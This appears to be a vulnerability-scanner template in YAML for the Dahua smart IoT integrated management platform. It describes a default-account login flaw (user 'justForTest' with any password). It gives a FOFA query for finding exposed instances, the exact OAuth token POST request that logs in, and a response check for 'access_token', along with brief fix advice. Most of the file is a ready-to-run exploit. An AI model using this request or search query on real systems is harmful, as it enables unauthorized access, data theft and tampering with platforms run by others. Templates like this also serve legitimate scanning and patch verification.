product: 大华智能物联综合管理平台
vName: 大华智能物联综合管理平台 justForTest用户登录漏洞
type: 访问控制
vID: [ ]
level: 3
vDesc: 当前版本智能物联综合管理平台，使用用户justForTest/任意密码即可成功登录平台，进入平台后台获取敏感数据、篡改、破坏后台设置等
version: ''
note: ''
search:
  FOFA: body="static/fontshd/font-hd.css" || body="客户端会小于800"
protocol: http
link: ''
fix:
  - 修改/禁用此默认用户
  - 前往官网升级版本
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /evo-apigw/evo-oauth/oauth/token
      data: username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - access_token
              - magicId
            logic: and
